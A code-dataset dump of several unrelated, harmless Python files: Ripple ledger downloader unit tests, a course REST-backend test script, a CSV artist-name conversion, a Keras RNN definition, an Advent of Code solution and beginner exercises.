e3e6513bd3ab0b4f93eae2ab6535cf0e3c2bf8ca | c4c484c3cf9b005433fa4ddbb08820b7177a005e | /test/test_grapple.py | acbc1f337f5698e09af2d4ca539316e16a5efbd4 | [
"MIT"
] | permissive | kai2008/grapple | ea1a8e20df2d485feb515b3dc5ff74434e646beb | 61e06ce27902e7285c9707947f8efe167fa4e6e9 | refs/heads/master | 2021-05-28T12:26:46.876954 | 2015-01-23T13:19:17 | 2015-01-23T13:19:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,982 | py | #!/usr/bin/env python
"""Grapple unit tests.
Remove the leading underscore from _test_init_fullrun and _test_init_smallrun
to do download tests, if your machine has a working rippled and Postgres
installation.
The other tests are run by connecting to Ripple Labs' public websocket.
At the moment, there are no tests for the methods that require a
database connection.
"""
from __future__ import division, print_function, unicode_literals, absolute_import
try:
import sys
import cdecimal
sys.modules["decimal"] = cdecimal
except:
pass
import os
import platform
from decimal import Decimal, getcontext, ROUND_HALF_EVEN
import psycopg2 as db
import psycopg2.extensions as ext
if platform.python_version() < "2.7":
unittest = __import__("unittest2")
else:
import unittest
HERE = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(HERE, os.pardir, "grapple"))
from grapple import Grapple
class TestGrapple(unittest.TestCase):
def setUp(self):
self.txhash = "BC02D079CB7B2087C70F857E6EDAFD72229887B9313C776890FB92D59CF3DD54"
self.grapple = Grapple(socket_url="wss://s1.ripple.com:51233/")
self.assertIsNone(self.grapple.socket)
def _test_init_fullrun(self):
self.grapple = Grapple(full=True)
self.assertTrue(self.grapple.full)
self.grapple.download()
def _test_init_smallrun(self):
self.grapple = Grapple(genesis=8642812)
self.assertEqual(self.grapple.halt, 8642812)
self.grapple.download()
def test_init_resampling_frequencies(self):
self.grapple = Grapple(resampling_frequencies=('8T', '12T'))
self.assertEqual(self.grapple.resampling_frequencies, ('8T', '12T'))
def test_rippled_connect(self):
self.assertIsNone(self.grapple.socket)
self.grapple.rippled_connect()
self.assertIsNotNone(self.grapple.socket)
self.assertTrue(self.grapple.socket.connected)
def test_get_current_index(self):
self.grapple.rippled_connect()
self.grapple.get_current_index()
self.assertIsNotNone(self.grapple.ledger_current_index)
self.assertEqual(type(self.grapple.ledger_current_index), int)
self.assertGreater(self.grapple.ledger_current_index, 8642812)
def test_read_next_ledger(self):
self.grapple.rippled_connect()
self.grapple.get_current_index()
self.grapple.ledgers_to_read = self.grapple.ledger_current_index - self.grapple.halt
self.grapple.ledger_index = self.grapple.ledger_current_index - 1
self.grapple.stored_tx = 0
ledger = self.grapple.read_next_ledger()
self.assertIsNotNone(ledger)
def test_parse_ledger(self):
self.grapple.rippled_connect()
self.grapple.get_current_index()
self.grapple.ledgers_to_read = self.grapple.ledger_current_index - self.grapple.halt
self.grapple.ledger_index = self.grapple.ledger_current_index - 1
self.grapple.stored_tx = 0
ledger = self.grapple.read_next_ledger()
tx_hash_list, accepted = self.grapple.parse_ledger(ledger)
def test_get_tx(self):
self.grapple.rippled_connect()
self.grapple.get_current_index()
self.grapple.ledgers_to_read = self.grapple.ledger_current_index - self.grapple.halt
self.grapple.ledger_index = self.grapple.ledger_current_index - 1
self.grapple.stored_tx = 0
ledger = self.grapple.read_next_ledger()
tx_hash_list, accepted = self.grapple.parse_ledger(ledger)
tx_data_result, options = self.grapple.get_tx(self.txhash, ledger)
self.assertIsNotNone(tx_data_result)
def tearDown(self):
if self.grapple.socket and self.grapple.socket.connected:
self.grapple.socket.close()
del self.grapple
if __name__ == "__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(TestGrapple)
unittest.TextTestRunner(verbosity=2).run(suite)
| [
"jack@tinybike.net"
] | jack@tinybike.net |
40ece971b33aaf536d5416eb3640969263889d8d | e25dd4bb657dd96b5a7c462651737b4a44ed9c81 | /hw8/test-backend.py | 88ca1c44ffda56bbad6adc69e450463f7d26125f | [] | no_license | Elina-L/comp431 | 99452326d59636b7e054f949bca23f0a5011cb75 | 9b46ad8d058864f267f5f2df16f1fec71a56f4bf | refs/heads/master | 2020-12-25T15:17:17.505374 | 2016-12-15T00:51:26 | 2016-12-15T00:51:26 | 66,399,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,856 | py | #!/usr/bin/env python
import requests, json, sys, pprint
pp = pprint.PrettyPrinter(indent=4)
class cc:
HEADER = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get(endpoint):
url = config["backend"] + endpoint
r = requests.get(url)
if r.status_code != 200:
print(cc.FAIL + ("ERROR: For GET %s received %d response code " % (endpoint, r.status_code)) + str(r.text) + cc.ENDC)
sys.exit(1)
return json.loads(r.text)
def put(endpoint):
url = config["backend"] + endpoint
r = requests.put(url)
if r.status_code != 200:
print(cc.FAIL + ("ERROR: For PUT %s received %d response code " % (endpoint, r.status_code)) + str(r.text) + cc.ENDC)
sys.exit(1)
return json.loads(r.text)
def getArticles(articleId=None):
endpoint = '/articles'
if articleId is not None:
endpoint = (endpoint + "/%d") % articleId
return checkArticles(get(endpoint))
def checkArticles(result):
if "articles" not in result:
print(cc.FAIL + "ERROR: GET /articles did not have \"articles\" entry" + cc.ENDC)
print(result)
return []
else:
return result["articles"]
def addArticle(body):
r = requests.post(config["backend"] + "/article", json={'text':body})
return checkArticles( json.loads(r.text) )
def msg(message):
print(cc.BLUE + message + cc.ENDC)
################################################
if len(sys.argv) < 2:
print("usage: %s README.json" % sys.argv[0])
sys.exit(1)
with open(sys.argv[1], 'r') as f:
config = json.loads(f.read())
for key in config.keys():
if config[key].endswith('/'):
config[key] = (config[key])[:-1]
print(cc.YELLOW + ("Checking for %s site %s" % (config['netid'], config['backend'])) + cc.ENDC)
######################################
# inital GET
r = get("/")
msg("GET /")
pp.pprint(r)
# GET /articles
articles = getArticles()
msg("GET /articles")
pp.pprint(articles)
if len(articles) < 3:
print(cc.FAIL + ("FAIL: Expected at least 3 articles from GET /articles but found %d " % len(articles)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /articles returned %d articles, expecting at least 3" % len(articles)) + cc.ENDC)
######################################
# add a new article
body = "Hello World!"
newArticles = addArticle(body)
msg("POST /article -d " + body)
pp.pprint(newArticles)
if len(newArticles) is not 1:
print(cc.FAIL + ("FAIL: Expected 1 new article added but found %d articles" % len(newArticles)) + cc.ENDC)
else:
newArticleId = newArticles[0]['id']
print(cc.GREEN + ("OK: POST /article returned one new article with id=%d" % newArticleId) + cc.ENDC)
if newArticles[0]['text'] != body:
print(cc.FAIL + ("FAIL: Article did not have the correct body message: %s vs %s" % (newArticles[0]['text'], body)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: article body was correct") + cc.ENDC)
######################################
# get that new article by itself
getNewArticle = getArticles(newArticleId)
msg("GET /articles/%d" % newArticleId)
pp.pprint(getNewArticle)
if len(getNewArticle) is not 1:
print(cc.FAIL + ("FAIL: Expected to get the one article that was added but found %d articles" % len(getNewArticle)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /articles/%d got the new article" % newArticleId) + cc.ENDC)
if getNewArticle[0]['text'] != newArticles[0]['text'] or newArticles[0]['text'] != body:
print(cc.FAIL + ("FAIL: Article did not have the correct text message: %s" % getNewArticle[0]['text']) + cc.ENDC)
else:
print(cc.GREEN + ("OK: article text was correct") + cc.ENDC)
######################################
# confirm that we only added one article
articles2 = getArticles()
msg("GET /articles")
pp.pprint(articles2)
if len(articles2) is not len(articles) + 1:
print(cc.FAIL + ("FAIL: Expected one new article added but found %d + 1 = %d" % (len(articles), len(articles2))) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /articles returned one additional article") + cc.ENDC)
######################################
print(cc.YELLOW + ('Testing stubs...') + cc.ENDC)
# Stubs
for e in [ "/headlines", "/headlines/"+config['netid'], "/email", "/email/"+config['netid'], "/zipcode", "/zipcode/"+config['netid'], "/avatars", "/avatars/" + config['netid'] ]:
msg("GET " + e)
pp.pprint(get(e))
for e in [ "/headline", "/email", "/zipcode", "/avatar" ]:
msg("PUT " + e)
pp.pprint(put(e))
## done
print(cc.YELLOW + ('COMPLETE!') + cc.ENDC)
| [
"noreply@github.com"
] | Elina-L.noreply@github.com |
547fa00ac73e716c3d016cbe991ff8100413263c | c26ba5147d5104096157daf7e92f29038dc96826 | /Script Files/PostProcessing/getArtistNames.py | 66463fc8fabd971de89ca41dd0858c947748bc3b | [] | no_license | xiazhuol/BookReco | 58e72ee0e4c99857f7e241b845693ecb1ea95245 | 095bb59cdf18e98f904d0ef8585334b656ef8bfc | refs/heads/master | 2021-03-17T18:36:54.086153 | 2020-03-13T09:34:43 | 2020-03-13T09:34:43 | 247,009,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 800 | py | real_artist_names = {}
artist_conversions = {}
with open('artist_names_metadata.txt', 'r') as f:
for line in f:
artist_id = line[0:7]
artist_name = line[8:]
artist_name = artist_name.replace(' ', '-')
artist_name=artist_name.strip()
real_artist_names[artist_id] = artist_name
with open('our_artists.txt', 'r') as f:
for line in f:
l = line.split()
big_id = l[0]
small_id=l[1]
artist_conversions[small_id] = big_id
with open('artist_conversions.csv', 'w') as w:
with open('finalUserData.csv') as f:
for line in f:
l = line.split(',')
u_id = l[0]
og_a_id = l[1]
rating = l[2]
rating = rating.strip()
a_id = artist_conversions[og_a_id]
artistName = real_artist_names[a_id]
toWrite = str(og_a_id)+","+str(artistName) + "\n"
w.write(toWrite)
| [
"xiazhuol@msu.edu"
] | xiazhuol@msu.edu |
f3764a8fc8b68e1515a012ad6d298ad0dfffbce8 | 7e16c7a48da4b10a860d1f159859fd6efd543a60 | /RNN_1C.py | 0de369ca841490f2b29d5fddd4c8c50a8c20ec82 | [] | no_license | OrestisAlpos/WebTrafficClassifier | e6c26b5988d88deba5e359759fabf8031515eb0d | bf1a4e65e295389cbd535e53c8a6db50b4ca85d5 | refs/heads/master | 2021-01-19T14:53:30.392890 | 2017-06-07T19:10:08 | 2017-06-07T19:10:08 | 88,193,170 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 892 | py |
from keras.models import Sequential
from keras.layers import Dense, Activation, SimpleRNN
from keras.utils.vis_utils import plot_model
import os
import numpy as np
from reader import Reader
length = Reader.getInputShape()
model = Sequential()
#EXPECTS INPUT AS (nb_sample, timesteps, nb_features), where nb_sample=1 (batch_size = 1), timesteps = 1 and nb_features = length
#model.add(Dense(40, input_dim = 12, init='uniform', activation='relu'))
model.add(SimpleRNN(units=50, input_shape=(1,length), batch_input_shape=(1,1,length), kernel_initializer='random_uniform', recurrent_initializer='random_uniform', activation='relu', stateful=True))
model.add(Dense(5, kernel_initializer='uniform', activation = 'softmax'))
model.summary()
plot_model(model, to_file='./RNNmodels/RNN_1C.png', show_shapes=True)
fp = open('./RNNmodels/RNN_1C.json', 'w')
fp.write(model.to_json())
fp.close()
| [
"or.al@hotmail.com"
] | or.al@hotmail.com |
1a7bacfc9808852cf7b990a159af019328d3deb0 | 9c0f691393abbeb5754e1624e0c48dfcdf857352 | /2017/Helpers/day_06.py | b8fc0de773effcccfda5ee364b548908e7b0101b | [] | no_license | seligman/aoc | d0aac62eda3e6adc3c96229ca859bd2274398187 | 9de27ff2e13100770a3afa4595b15565d45bb6bc | refs/heads/master | 2023-04-02T16:45:19.032567 | 2023-03-22T15:05:33 | 2023-03-22T15:05:33 | 230,493,583 | 17 | 10 | null | null | null | null | UTF-8 | Python | false | false | 1,540 | py | #!/usr/bin/env python3
DAY_NUM = 6
DAY_DESC = 'Day 6: Memory Reallocation'
def calc(log, values, redo):
banks = [int(x) for x in values[0].replace("\t", " ").split(" ")]
seen = set()
while True:
key = tuple(banks)
if key in seen:
if redo == 0:
break
else:
seen = set()
redo -= 1
seen.add(key)
i = banks.index(max(banks))
val = banks[i]
banks[i] = 0
for x in range(val):
banks[(i + 1 + x) % len(banks)] += 1
return len(seen)
def test(log):
values = [
"0 2 7 0",
]
if calc(log, values, 0) == 5:
if calc(log, values, 1) == 4:
return True
else:
return False
else:
return False
def run(log, values):
log(calc(log, values, 0))
log(calc(log, values, 1))
if __name__ == "__main__":
import sys, os
def find_input_file():
for fn in sys.argv[1:] + ["input.txt", f"day_{DAY_NUM:0d}_input.txt", f"day_{DAY_NUM:02d}_input.txt"]:
for dn in [[], ["Puzzles"], ["..", "Puzzles"]]:
cur = os.path.join(*(dn + [fn]))
if os.path.isfile(cur): return cur
fn = find_input_file()
if fn is None: print("Unable to find input file!\nSpecify filename on command line"); exit(1)
print(f"Using '{fn}' as input file:")
with open(fn) as f: values = [x.strip("\r\n") for x in f.readlines()]
print(f"Running day {DAY_DESC}:")
run(print, values)
| [
"scott.seligman@gmail.com"
] | scott.seligman@gmail.com |
b26893e0db5a57db2eed7de038eedc67337aecbf | b6f583d181011005a387b100931eaad8d0a00964 | /even odd sum of 3 digit num.py | 316bef4025a1fcf5c1d90a98daf2310a56023af3 | [] | no_license | abhaysingh00/PYTHON | fe6fa42c7057231bdba258d49846cca51ff2a350 | 2ef662b66641121ba3b8187d571a90e964e2ec77 | refs/heads/main | 2023-08-15T13:19:52.685749 | 2021-09-10T18:29:08 | 2021-09-10T18:29:08 | 404,481,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | n= int(input("enter a three digit number: "))
i=n
sm=0
count=0
while(i>0):
count=count+1
sm=i%10+sm
i=i//10
if(count==3):
print(sm)
if(sm%2==0):
print("the sum is even")
else:
print("the sum is odd")
else:
print("the number entered is not of 3 digits")
| [
"abhay.2024cse1147@kiet.edu"
] | abhay.2024cse1147@kiet.edu |
a8a9884b2c45f1d68f56cbb5f3372047f190ed2e | a4c5540f4ff38d5445ab20ed80a57e224d12518f | /homeWork/password.py | dae1ac2526cd5b8cc3788caaa0624d929ec87644 | [] | no_license | qikai521/PyStu | b8f12457c10008825b82e921ebb307d1ef032f9d | 527983744bdb8da634ef3dc9e67012273cb1514e | refs/heads/master | 2021-01-25T09:31:58.542923 | 2017-06-21T10:26:04 | 2017-06-21T10:26:18 | 93,846,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | length = 0;
while True:
if (length%2 == 1 and length %3 == 2 and length%5 == 4 and length%6 ==5 and length%7 == 0):
print("length == ",length)
break;
else:
print("other")
length += 1
#password :
nums = '1234567890'
chars = 'qwertyuiopasdfghjklzxcvbnm'
#低级密码要求:
# 1. 密码由单纯的数字或字母组成
# 2. 密码长度小于等于8位
password = input("请输入您要验证的密码:")
while (len(password) == 0 or password.isspace()):
password = input("请重新输入");
if len(password > 0):
break;
if len(password) >= 8 :
print("密码过长")
else:
checkCount = 0;
for word in password:
checkCount += 1
if (word in nums) or (word in chars):
if checkCount == len(password) :
print("密码格式正确")
continue;
else:
print("密码输入格式错误")
break;
| [
"664642260@qq.com"
] | 664642260@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.